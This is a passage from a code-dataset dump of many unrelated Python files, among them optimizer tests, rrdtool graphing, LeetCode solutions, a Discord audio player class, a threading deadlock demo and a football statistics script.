NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n#SOFTWARE.\n###############################################################################\n\nimport copy\n\nimport pytest\n\nfrom optimal import optimize\nfrom optimal.genalg import GenAlg\n\n\ndef simple_function(binary):\n    finished = binary[0] and binary[1]\n    return float(binary[0])+float(binary[1])+0.001, finished\n\n\ndef test_get_hyperparameters():\n    optimizer = optimize.StandardOptimizer(simple_function, 2)\n\n    hyperparameters = optimizer._get_hyperparameters()\n    assert hyperparameters is not None\n    assert hyperparameters['_population_size']\n\n\ndef test_set_hyperparameters_wrong_parameter():\n    optimizer = optimize.StandardOptimizer(simple_function, 2)\n\n    with pytest.raises(ValueError):\n        optimizer._set_hyperparameters({'test': None})\n\n\ndef test_meta_optimize_parameter_locks():\n    # Run meta optimize with locks\n    # assert that locked parameters did not change\n\n    # Only optimize mutation chance\n    parameter_locks = ['_population_size', '_crossover_chance', '_selection_function', '_crossover_function']\n\n    my_genalg = GenAlg(simple_function, 2)\n    original = copy.deepcopy(my_genalg)\n\n    # Low smoothing for faster performance\n    my_genalg.optimize_hyperparameters(parameter_locks=parameter_locks, smoothing=1)\n\n    # Check that mutation chance changed\n    assert my_genalg._mutation_chance != original._mutation_chance\n\n    # And all others stayed the same\n    for parameter in parameter_locks:\n        assert getattr(my_genalg, parameter) == getattr(original, parameter)","sub_path":"optimal/tests/test_optimize.py","file_name":"test_optimize.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"291444966","text":"n = int(input())\r\nvetor = [int(i) for i in input().split()]\r\nmenor = min(vetor)\r\nposicao = 0\r\nfor i in range(len(vetor)):\r\n    if vetor[i] == menor:\r\n        posicao = i\r\n        break\r\n\r\nprint(\"Menor valor: \" + str(menor))\r\nprint(\"Posicao: \" + str(posicao))\r\n","sub_path":"Python/URI/1180.py","file_name":"1180.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"549961927","text":"import time\nimport rrdtool\nfrom path import *\n\ntitle = \"Anomalous behavior detection, Alpha value 0.1\"\nendDate = rrdtool.last(rrdpath + rrdname)  # last value in the XML\nbegDate = endDate - 2000\n\n# tiempo_actual = int(time.time())\n# tiempo_final = tiempo_actual - 86400\n# tiempo_inicial = tiempo_final -25920000\n\n\nwhile True:\n    rrdtool.tune(rrdpath + rrdname, '--alpha', '0.1')\n    # rrdtool.tune(rrdpath + rrdname, '--window-length', '5')\n    # rrdtool.tune(rrdpath + rrdname, '--failure-threshold', '3')\n    ret = rrdtool.graph(pngpath + \"testNetPalphaBajoFallas.png\",\n                        '--start', str(begDate), \n                        '--end', str(endDate), \n                        '--title=' + title,\n                        '--width=1240', '--height=400',\n                        \"--color\", \"ARROW#009900\",\n                        '--vertical-label', \"Bytes/s\",\n                        '--border', '0',\n                        '--rigid',\n                        '--slope-mode',\n\n                        # \"DEF:obs=\" + rrdpath + rrdname + \":inoctets:AVERAGE\",\n                        \"DEF:obs=\" + rrdpath + rrdname + \":outoctets:AVERAGE\",\n                        # \"DEF:pred=\" + rrdpath + rrdname + \":inoctets:HWPREDICT\",\n                        \"DEF:pred=\" + rrdpath + rrdname + \":outoctets:HWPREDICT\",\n                        # \"DEF:dev=\" + 
rrdpath + rrdname + \":inoctets:DEVPREDICT\",\n \"DEF:dev=\" + rrdpath + rrdname + \":outoctets:DEVPREDICT\",\n # \"DEF:fail=\" + rrdpath + rrdname + \":inoctets:FAILURES\",\n \"DEF:fail=\" + rrdpath + rrdname + \":outoctets:FAILURES\",\n\n #\"RRA:DEVSEASONAL:1d:0.1:2\",\n #\"RRA:DEVPREDICT:5d:5\",\n #\"RRA:FAILURES:1d:7:9:5\"\"\n \"CDEF:scaledobs=obs,8,*\",\n \"CDEF:upper=pred,dev,2,*,+\",\n \"CDEF:lower=pred,dev,2,*,-\",\n \"CDEF:scaledupper=upper,8,*\",\n \"CDEF:scaledlower=lower,8,*\",\n \"CDEF:scaledpred=pred,8,*\",\n\n \"TICK:fail#ffffa0:1.0:Failures\\\\n\",\n\n \"LINE1:scaledobs#00FF00:Average bits out\\\\n\",\n\n \"LINE3:scaledpred#FF00FF:Prediccion\\\\n\",\n #\"LINE1:outoctets#0000FF:Out traffic\",\n #\n # \"LINE1:scaledupper#ff0000:Upper Bound Average bits in\",\n \"LINE2:scaledupper#ff0000:Upper Bound Average bits out\\\\n\",\n # \"LINE1:scaledlower#0000FF:Lower Bound Average bits in\"\n \"LINE2:scaledlower#0000FF:Lower Bound Average bits out\\\\n\"\n )\n\n time.sleep(30)\n","sub_path":"6o Semestre/Aplicaciones para comunicaciones en red/Trend-Non-Linear/rrdPredGraph.py","file_name":"rrdPredGraph.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"65130392","text":"\n\nfrom xai.brain.wordbase.nouns._greenhorn import _GREENHORN\n\n#calss header\nclass _GREENHORNS(_GREENHORN, ):\n\tdef __init__(self,): \n\t\t_GREENHORN.__init__(self)\n\t\tself.name = \"GREENHORNS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"greenhorn\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_greenhorns.py","file_name":"_greenhorns.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"172525915","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def pathSum(self, root: TreeNode, s: int) -> List[List[int]]:\n def dfs(node,s,ans,out):\n if not node.left and not node.right:\n if sum(ans)==s:\n out.append(list(ans))\n return\n if node.left:\n ans.append(node.left.val)\n dfs(node.left,s,ans,out)\n ans.pop()\n if node.right:\n ans.append(node.right.val)\n dfs(node.right,s,ans,out)\n ans.pop()\n if not root:\n return []\n out=[]\n ans=[root.val]\n dfs(root,s,ans,out)\n return out\n \n","sub_path":"Problem113_Path_SumII.py","file_name":"Problem113_Path_SumII.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"339531988","text":"import numpy as np\nimport pandas as pd\nimport os\n\nserverPath = \"./go-server/\"\n\n## Create file load in function\ndef AddPhotoURL(fileName):\n ## load in test csv files as dataframes\n # fileName = \"top_house_reps.csv\"\n fileContent = pd.read_csv(TargetFolder + \"/\" + fileName)\n\n ## add photoURL based on https://theunitedstates.io/images/congress/450x550/O000172.jpg\n for i, row in fileContent.iterrows():\n photo_url = \"https://theunitedstates.io/images/congress/450x550/\" + row.id + \".jpg\"\n fileContent.loc[i,\"photo_url\"] = photo_url\n\n ## save out file \n filePath = serverPath + \"/test_data/\" + fileName\n fileContent.to_csv(filePath, index=False)\n print(\"Adding Photo URL to \" + file)\n\n## pull all files in the 'test_data' dir and execute function\nTargetFolder = serverPath + \"/test_data\"\nfor file in os.listdir(TargetFolder):\n if file != 
\"user_favorite_reps.csv\":\n AddPhotoURL(file)","sub_path":"go-server/data-utils/test_data_transform.py","file_name":"test_data_transform.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"56481494","text":"from xml.sax.handler import ContentHandler\nfrom xml.sax import make_parser\nfrom urllib.request import urlopen\nimport sys\nimport os.path\nimport string\n\n\ndef normalize_whitespace(texto):\n return str.join(' ',str.split(texto))\n\nclass myContentHandler(ContentHandler):\n\n def __init__ (self):\n #NOMBRE DESCRIPCION ACCESIBILIDAD CONTENT-URL\n #NOMBRE-VIA CLASE-VIAL NUM CODIGO-POSTAL BARRIO DISTRITO LATITUD LONGITUD\n self.inContent = False \n self.theContent = \"\"\n self.atributo = \"\"\n self.nombre = \"\"\n self.descripcion = \"\"\n self.access = \"\"\n self.url = \"\"\n self.nombreVia = \"\"\n self.num = \"\"\n self.codigo = \"\"\n self.barrio = \"\"\n self.distrito = \"\"\n self.latitud = \"\"\n self.longitud = \"\"\n self.email = \"\"\n self.telefono = \"\"\n self.listDic = [] #Lista de diccionarios, uno por cada aparcamiento\n self.dic = {}\n\n\n def startElement (self, name, attrs):\n if name == \"atributo\":\n self.atributo = normalize_whitespace(attrs.get('nombre'))\n if self.atributo in ['NOMBRE','DESCRIPCION','ACCESIBILIDAD','CONTENT-URL','NOMBRE-VIA','NUM','CODIGO-POSTAL','BARRIO','DISTRITO','LATITUD','LONGITUD','TELEFONO','EMAIL']:\n self.inContent = True\n\n def endElement (self, name):\n if self.inContent:\n self.theContent = normalize_whitespace(self.theContent)\n\n if self.atributo == 'NOMBRE':\n self.nombre = self.theContent\n self.dic[self.atributo] = self.nombre\n\n elif self.atributo == 'DESCRIPCION':\n self.descripcion = self.theContent\n self.dic[self.atributo] = self.descripcion\n\n elif self.atributo == 'ACCESIBILIDAD':\n if self.theContent == '1':\n self.access = 'SI'\n else:\n self.access = 'NO'\n\n self.dic[self.atributo] = self.access\n\n elif self.atributo == 'CONTENT-URL':\n self.url = self.theContent\n self.dic[self.atributo] = self.url\n\n elif self.atributo == 'NOMBRE-VIA':\n self.nombreVia = self.theContent\n self.dic[self.atributo] = self.nombreVia\n\n elif self.atributo == 'NUM':\n self.num = self.theContent\n self.dic[self.atributo] = self.num\n\n elif self.atributo == 'CODIGO-POSTAL':\n self.codigo = self.theContent\n self.dic[self.atributo] = self.codigo\n\n elif self.atributo == 'BARRIO':\n self.barrio = self.theContent\n self.dic[self.atributo] = self.barrio\n\n elif self.atributo == 'DISTRITO':\n self.distrito = self.theContent\n self.dic[self.atributo] = self.distrito\n\n elif self.atributo == 'LATITUD':\n self.latitud = self.theContent\n self.dic[self.atributo] = self.latitud\n\n elif self.atributo == 'LONGITUD':\n #self.longitud = self.theContent\n self.dic[self.atributo] = self.theContent\n\n elif self.atributo == 'TELEFONO':\n #self.telefono = self.theContent\n self.dic[self.atributo] = self.theContent\n elif self.atributo == 'EMAIL':\n #self.email = self.theContent\n self.dic[self.atributo] = self.theContent\n \n elif name == 'contenido': \n self.listDic.append(self.dic)\n self.dic = {}\n self.nombre = \"\"\n self.descripcion = \"\"\n self.access = \"\"\n self.url = \"\"\n self.nombreVia = \"\"\n self.num = \"\"\n self.codigo = \"\"\n self.barrio = \"\"\n self.distrito = \"\" \n self.latitud = \"\"\n self.longitud = \"\" \n self.telefono = \"\"\n self.email = \"\"\n self.inContent = False\n self.theContent = \"\"\n\n def characters 
(self, chars):\n if self.inContent:\n self.theContent = self.theContent + chars\n\n\n def getLista(self):\n return self.listDic\n\n \n# Load parser and driver\n\n\"\"\"\ntheParser = make_parser()\ntheHandler = myContentHandler()\ntheParser.setContentHandler(theHandler)\n\n# Ready, set, go!\n\nxmlFile = urlopen('http://datos.munimadrid.es/portal/site/egob/menuitem.ac61933d6ee3c31cae77ae7784f1a5a0/?vgnextoid=00149033f2201410VgnVCM100000171f5a0aRCRD&format=xml&file=0&filename=202584-0-aparcamientos-residentes&mgmtid=e84276ac109d3410VgnVCM2000000c205a0aRCRD&preview=full')\ntheParser.parse(xmlFile)\n\nlista = theHandler.getLista()\nprint(lista)\nprint (\"Parse complete\")\n\n\"\"\"","sub_path":"practica_final/aparcamientos/xmlParser.py","file_name":"xmlParser.py","file_ext":"py","file_size_in_byte":4598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"385393612","text":"import rospy\nfrom sensor_msgs.msg import JointState\n\ndef callback(data):\n\trospy.loginfo(data)\n\ndef listener():\n\trospy.init_node('JointStateListenerNode')\n\trospy.Subscriber(\"/rx150/joint/commands\", JointState, callback)\n\trospy.spin()\n\trospy.sleep(1)\n\nwhile(True):\n\tlistener()\n\trospy.sleep(1)\n","sub_path":"ROS_Test_2/JointcommandSubscriber.py","file_name":"JointcommandSubscriber.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"145707508","text":"\n\nfrom xai.brain.wordbase.adjectives._flaky import _FLAKY\n\n#calss header\nclass _FLAKIER(_FLAKY, ):\n\tdef __init__(self,): \n\t\t_FLAKY.__init__(self)\n\t\tself.name = \"FLAKIER\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"flaky\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_flakier.py","file_name":"_flakier.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"507022428","text":"# Copyright (C) 2011 Canonical\n#\n# Authors:\n# Michael Vogt\n#\n# This program is free software; you can redistribute it and/or modify it under\n# the terms of the GNU General Public License as published by the Free Software\n# Foundation; version 3.\n#\n# This program is distributed in the hope that it will be useful, but WITHOUT\n# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\n# FOR A PARTICULAR PURPOSE. 
See the GNU General Public License for more\n# details.\n#\n# You should have received a copy of the GNU General Public License along with\n# this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n\nimport os\nimport logging\nfrom softwarecenter.enums import APP_INSTALL_PATH_DELIMITER\n\nLOG = logging.getLogger(__name__)\n\n\nclass GMenuSearcher(object):\n\n def __init__(self):\n self._found = None\n\n def _search_gmenu_dir(self, dirlist, needle):\n if not dirlist[-1]:\n return\n from gi.repository import GMenu\n dir_iter = dirlist[-1].iter()\n current_type = dir_iter.next()\n while current_type is not GMenu.TreeItemType.INVALID:\n if current_type == GMenu.TreeItemType.DIRECTORY:\n self._search_gmenu_dir(\n dirlist + [dir_iter.get_directory()], needle)\n elif current_type == GMenu.TreeItemType.ENTRY:\n item = dir_iter.get_entry()\n desktop_file_path = item.get_desktop_file_path()\n # direct match of the desktop file name and the installed\n # desktop file name\n if os.path.basename(desktop_file_path) == needle:\n self._found = dirlist + [item]\n return\n # if there is no direct match, take the part of the path after\n # \"applications\" (e.g. kde4/amarok.desktop) and\n # change \"/\" to \"__\" and do the match again - this is what\n # the data extractor is doing\n if \"applications/\" in desktop_file_path:\n path_after_applications = desktop_file_path.split(\n \"applications/\")[1]\n if needle == path_after_applications.replace(\"/\",\n APP_INSTALL_PATH_DELIMITER):\n self._found = dirlist + [item]\n return\n current_type = dir_iter.next()\n\n def get_main_menu_path(self, desktop_file, menu_files_list=None):\n if not desktop_file:\n return\n from gi.repository import GMenu\n from gi.repository import GObject\n # use the system ones by default, but allow override for\n # easier testing\n if menu_files_list is None:\n menu_files_list = [\"applications.menu\", \"settings.menu\"]\n for n in menu_files_list:\n if n.startswith(\"/\"):\n tree = GMenu.Tree.new_for_path(n, 0)\n else:\n tree = GMenu.Tree.new(n, 0)\n try:\n tree.load_sync()\n except GObject.GError as e:\n LOG.warning(\"could not load GMenu path: %s\" % e)\n return\n\n root = tree.get_root_directory()\n self._search_gmenu_dir([root],\n os.path.basename(desktop_file))\n if self._found:\n return self._found\n\n\n# these are the old static bindinds that are no longer required\n# (this is just kept here in case of problems with the dynamic\n# GIR and the old gtk2 gtk ui)\nclass GMenuSearcherGtk2(object):\n\n def __init__(self):\n self._found = None\n\n def _search_gmenu_dir(self, dirlist, needle):\n if not dirlist[-1]:\n return\n\n import gmenu\n for item in dirlist[-1].get_contents():\n mtype = item.get_type()\n if mtype == gmenu.TYPE_DIRECTORY:\n self._search_gmenu_dir(dirlist + [item], needle)\n elif item.get_type() == gmenu.TYPE_ENTRY:\n desktop_file_path = item.get_desktop_file_path()\n # direct match of the desktop file name and the installed\n # desktop file name\n if os.path.basename(desktop_file_path) == needle:\n self._found = dirlist + [item]\n return\n # if there is no direct match, take the part of the path after\n # \"applications\" (e.g. 
kde4/amarok.desktop) and\n                # change \"/\" to \"__\" and do the match again - this is what\n                # the data extractor is doing\n                if \"applications/\" in desktop_file_path:\n                    path_after_applications = desktop_file_path.split(\n                        \"applications/\")[1]\n                    if needle == path_after_applications.replace(\"/\",\n                        APP_INSTALL_PATH_DELIMITER):\n                        self._found = dirlist + [item]\n                        return\n\n    def get_main_menu_path(self, desktop_file, menu_files_list=None):\n        if not desktop_file:\n            return\n        import gmenu\n        # use the system ones by default, but allow override for\n        # easier testing\n        if menu_files_list is None:\n            menu_files_list = [\"applications.menu\", \"settings.menu\"]\n        for n in menu_files_list:\n            tree = gmenu.lookup_tree(n)\n            self._search_gmenu_dir([tree.get_root_directory()],\n                os.path.basename(desktop_file))\n            if self._found:\n                return self._found\n","sub_path":"mp4/SD_card/partition1/usr/share/software-center/softwarecenter/ui/gtk3/gmenusearch.py","file_name":"gmenusearch.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"519756655","text":"import logging\nimport time\nimport json\n\nfrom discord.ext import commands\n\nfrom .filters import Filter\n\nlogger = logging.getLogger(__name__)\n\n\nclass Player:\n    def __init__(self, bot: commands.Bot, guild_id: int, node):\n        self.bot = bot\n        self.guild_id = guild_id\n        self.node = node\n\n        self.last_update = None\n        self.last_position = None\n        self.last_state = None\n        self.position_timestamp = None\n\n        self._voice_state = {}\n\n        self.volume = 100\n        self.paused = False\n        self.current = None\n        self.channel_id = None\n\n    @property\n    def is_connected(self):\n        return self.channel_id is not None\n\n    async def update_state(self, state: dict):\n        state = state[\"state\"]\n\n        self.last_state = state\n        self.last_update = time.time() * 1000\n        self.last_position = state.get(\"position\", 0)\n        self.position_timestamp = state.get(\"time\", 0)\n\n    async def _voice_server_update(self, data):\n        self._voice_state.update({\"event\": data})\n        await self._dispatch_voice_update()\n\n    async def _voice_state_update(self, data):\n        self._voice_state.update({\"sessionId\": data[\"session_id\"]})\n\n\n        if data['channel_id'] is None:\n            self.channel_id = None\n        else:\n            self.channel_id = int(data[\"channel_id\"])\n\n        if not self.channel_id:\n            self._voice_state.clear()\n            return logger.debug(\"PLAYER | Player-update with no channel_id, Clearing state\")\n\n        await self._dispatch_voice_update()\n\n    async def _dispatch_voice_update(self):\n        if {\"sessionId\", \"event\"} == self._voice_state.keys():\n            logger.debug(f\"PLAYER | Updating voice-state\")\n            await self.node._websocket._send(\n                op=\"voice-server-update\",\n                guildId=str(self.guild_id),\n                **self._voice_state,\n            )\n\n    async def connect(self, channel_id: int):\n        \"\"\"\n        Connects to a VoiceChannel,\n        Params:\n        - channel_id integer\n        \"\"\"\n        guild = self.bot.get_guild(self.guild_id)\n        if not guild:\n            raise ValueError(f\"Invalid guild id {self.guild_id}\")\n\n        self.channel_id = channel_id\n\n        ws = self.bot._connection._get_websocket(guild.id)\n        await ws.voice_state(self.guild_id, str(channel_id))\n\n        logger.info(f\"PLAYER | Connected to voice channel: {channel_id}\")\n\n    async def disconnect(self):\n        \"\"\"\n        Disconnect from the current voice channel by clearing the voice state.\n        \"\"\"\n        ws = self.bot._connection._get_websocket(self.guild_id)\n        await ws.voice_state(self.guild_id, None)\n\n    async def set_filters(self, filter_type):\n        if not issubclass(filter_type.__class__, 
Filter):\n            raise TypeError(\"All filters must derive from `Filter`\")\n\n        await self.node._websocket._send(op=\"filter\", guildId=str(self.guild_id), **filter_type._payload)\n\n    async def play(self, track):\n        self.last_update = 0\n        self.last_position = 0\n        self.position_timestamp = 0\n        self.paused = False\n\n        self.current = track\n\n        await self.node._websocket._send(\n            op=\"play\", guildId=str(self.guild_id), track=track.id\n        )\n        logger.debug(f\"PLAYER | Now playing {track.title} in {self.channel_id}\")\n\n    async def set_pause(self, pause):\n        if pause is self.paused:\n            return\n\n        self.paused = pause\n\n        await self.node._websocket._send(\n            op=\"pause\", pause=pause, guildId=str(self.guild_id)\n        )\n\n    async def seek(self, position):\n        if not 0 < position < self.current.length:\n            raise ValueError(\n                \"Position cannot be smaller than 0 or larger than track's length\"\n            )\n\n        await self.node._websocket._send(\n            op=\"seek\", position=position, guildId=str(self.guild_id)\n        )\n\n    async def set_volume(self, volume):\n        await self.node._websocket._send(\n            op=\"volume\", volume=volume, guildId=str(self.guild_id)\n        )\n\n    async def stop(self):\n        await self.node._websocket._send(op=\"stop\", guildId=str(self.guild_id))\n\n\n    async def get_tracks(self, query: str):\n        return await self.node.get_tracks(query)\n\n    async def destroy(self):\n        await self.stop()\n        await self.disconnect()\n\n\n        await self.node._websocket._send(op=\"destroy\", guildId=str(self.guild_id))\n        del self.node.players[self.guild_id]","sub_path":"andesite/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"388356171","text":"# -*- coding: utf-8 -*-\n\"\"\"\n__title__ = '09 死锁与递归锁.py'\n__author__ = 'yangyang'\n__mtime__ = '2018.02.08'\n\"\"\"\n\n# Deadlock: a situation in which two or more processes or threads wait on each other while competing for resources during execution; without outside intervention, none of them can make any progress. The system is then said to be in a deadlock state (or to have deadlocked), and the processes that wait on each other forever are called deadlocked processes. The code below produces a deadlock.\n\n# The cause of the deadlock below: each of the two threads holds a lock that the other one needs, so they deadlock.\nfrom threading import Thread,Lock\nimport time\nmutexA=Lock()\nmutexB=Lock()\n\nclass MyThread(Thread):\n    def run(self):\n        self.func1()\n        self.func2()\n    def func1(self):\n        mutexA.acquire()\n        print('\\033[41m%s acquired lock A\\033[0m' % self.name)\n\n        mutexB.acquire()\n        print('\\033[42m%s acquired lock B\\033[0m' % self.name)\n        mutexB.release()\n\n        mutexA.release()\n\n    def func2(self):\n        mutexB.acquire()\n        print('\\033[43m%s acquired lock B\\033[0m' % self.name)\n        time.sleep(2)\n\n        mutexA.acquire()\n        print('\\033[44m%s acquired lock A\\033[0m' % self.name)\n        mutexA.release()\n\n        mutexB.release()\n\nif __name__ == '__main__':\n    for i in range(10):\n        t=MyThread()\n        t.start()\n\n# Recursive lock: it can be acquired multiple times in a row; each acquire increments an internal counter by 1 and each release decrements it by 1, so as long as the recursive lock's counter is not 0, no other thread can grab it.\n#\n# from threading import Thread,RLock\n# import time\n# mutexA=RLock()  # create the recursive lock object\n# print(\"mutexA\",mutexA)\n#\n#\n# class MyThread(Thread):\n#     def run(self):\n#         self.func1()\n#         self.func2()\n#     def func1(self):\n#         mutexA.acquire()\n#         print('\\033[41m%s acquired lock A\\033[0m' % self.name)\n#         mutexA.acquire()\n#         print('\\033[42m%s acquired lock B\\033[0m' % self.name)\n#         mutexA.release()\n#         mutexA.release()\n#\n#     def func2(self):\n#         mutexA.acquire()\n#         print('\\033[43m%s acquired lock B\\033[0m' % self.name)\n#         time.sleep(2)\n#\n#         mutexA.acquire()\n#         print('\\033[44m%s acquired lock A\\033[0m' % self.name)\n#         mutexA.release()\n#         mutexA.release()\n#\n# if __name__ == '__main__':\n#     for i in range(10):\n#         t=MyThread()\n#         t.start()\n","sub_path":"fourth_module/多线程多进程/new/多线程/09 死锁与递归锁.py","file_name":"09 
死锁与递归锁.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"97446569","text":"import pandas as pd\n\nfrom ..describe import describe, Description\nfrom ..io import readCsv\n\n@describe(\n Description('Append columns', 'the columns of two data tables using a matching key.', dockerImage='kitware/pysciencedock')\n .input('table1', 'The first data table', type='file', deserialize=readCsv)\n .input('table2', 'The second data table', type='file', deserialize=readCsv)\n .output('combined', 'The combined table', type='new-file', serialize=lambda df, fileName: df.to_csv(fileName))\n)\ndef append_columns(table1, table2):\n first_join_column = ['hour','day','year','date','time']\n second_join_column = first_join_column \n result_df = pd.merge(table1, table2, how='outer', left_on=first_join_column, right_on=second_join_column)\n return result_df \n","sub_path":"pysciencedock/transform/append_columns.py","file_name":"append_columns.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"398133664","text":"class Solution:\n def longestCommonSubsequence(self, t1: str, t2: str) -> int:\n if not t1 or not t2: return 0\n m, n= len(t1), len(t2)\n \n dp= [[0]*(n+1) for _ in range(2)]\n \n for i in range(1, m+1):\n for j in range(1, n+1):\n if t1[i-1]==t2[j-1]:\n dp[i%2][j]= dp[(i-1)%2][j-1]+1\n else:\n dp[i%2][j]= max(dp[(i-1)%2][j], dp[i%2][j-1])\n \n \n return dp[m%2][n]\n \n","sub_path":"lc_1143_Longest_Common_Subsequence.py","file_name":"lc_1143_Longest_Common_Subsequence.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"477012251","text":"# import random\n\n\ndef guess_game(): \n tempNum = 30\n count_tries = 1\n inputNum = int(input(\"Give me a number from 1 to 100: \"))\n while inputNum != tempNum:\n if count_tries == 4:\n break\n elif inputNum > tempNum:\n print(\"too high!\")\n else:\n print(\"too low!\")\n inputNum = int(input(\"Please insert a new number: \"))\n count_tries += 1\n if inputNum == tempNum:\n print(\"just right!\")\n else:\n print(\"Sorry, try again from scratch!\")\n print(\"End of the game! 
\")\n\n\nexample = guess_game()\n","sub_path":"Python_Workout_Ex_1.py","file_name":"Python_Workout_Ex_1.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"411427159","text":"import unittest\nfrom collections import namedtuple\n\nfrom yahtzee.util import rgetattr\n\nclass TestVector(unittest.TestCase):\n\n def test_recursive_hasattrs(self):\n obj = namedtuple('TopLevel', 'a')(\n namedtuple('MidLevel', 'b')(\n namedtuple('BottomLevel', 'c')(3)\n )\n )\n\n self.assertEqual(rgetattr(obj, 'a'), obj.a)\n self.assertEqual(rgetattr(obj, 'a', 'b'), obj.a.b)\n self.assertEqual(rgetattr(obj, 'a', 'b', 'c'), 3)\n\n self.assertRaises(AttributeError, rgetattr, obj, 'a', 'nope')\n self.assertRaises(AttributeError, rgetattr, obj, 'a', 'b', 'c', 'd')\n self.assertIs(rgetattr(obj, 'a', 'b', 'c', 'd', default=obj.a), obj.a)\n\n self.assertIs(rgetattr(obj, 'nope', default=obj.a), obj.a)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"200802767","text":"import logging\nfrom Utils import load_games\nfrom pprint import pprint\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport csv\n\ncsv_output = []\nheadings = ['season', 'league', 'team', 'w', 'l', 'd', 'pts', 'AMV', 'AMS', 'AMST', 'position']\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG)\n\n league = \"E0\"\n for season in range(2000, 2015):\n for league in [\"E0\", \"E1\"]:\n results = {}\n for game in load_games(season, league):\n\n away_mv = game[\"FTAG\"] - game[\"FTHG\"]\n away_ms = game[\"AS\"] - game['HS']\n away_mst = game[\"AST\"] - game['HST']\n home_mv = game[\"FTHG\"] - game[\"FTAG\"]\n home_ms = game[\"HS\"] - game['AS']\n home_mst = game[\"HST\"] - game['AST']\n\n if game[\"HomeTeam\"] not in results:\n results[game[\"HomeTeam\"]] = {\n \"MV\": [],\n \"MS\": [],\n \"MST\": [],\n \"W\": 0,\n \"L\": 0,\n \"D\": 0,\n }\n\n if game[\"AwayTeam\"] not in results:\n results[game[\"AwayTeam\"]] = {\n \"MV\": [],\n \"MS\": [],\n \"MST\": [],\n \"W\": 0,\n \"L\": 0,\n \"D\": 0,\n }\n\n if game['FTR'] == 'H':\n results[game[\"HomeTeam\"]]['W'] += 1\n results[game[\"AwayTeam\"]]['L'] += 1\n elif game['FTR'] == 'A':\n results[game[\"HomeTeam\"]]['L'] += 1\n results[game[\"AwayTeam\"]]['W'] += 1\n elif game['FTR'] == 'D':\n results[game[\"HomeTeam\"]]['D'] += 1\n results[game[\"AwayTeam\"]]['D'] += 1\n else:\n logging.critical(\"Result was an unknown value %s\" % game['FTR'])\n\n results[game[\"AwayTeam\"]]['MV'].append(away_mv)\n results[game[\"HomeTeam\"]]['MV'].append(home_mv)\n\n results[game[\"AwayTeam\"]]['MS'].append(away_ms)\n results[game[\"HomeTeam\"]]['MS'].append(away_mst)\n\n results[game[\"AwayTeam\"]]['MST'].append(away_ms)\n results[game[\"HomeTeam\"]]['MST'].append(away_mst)\n\n AMVs = []\n AMSs = []\n AMSTs = []\n points = []\n\n for team in sorted(results.keys()):\n AMVs.append(np.average(results[team]['MV']))\n AMSs.append(np.average(results[team]['MS']))\n AMSTs.append(np.average(results[team]['MST']))\n points.append(results[team]['W'] * 3 + results[team]['D'])\n\n array = np.array(points)\n temp = array.argsort()[::-1]\n positions = np.arange(len(array))[temp.argsort()]\n positions = positions + 1\n\n for ii in range(len(results.keys())):\n team = sorted(results.keys())[ii]\n 
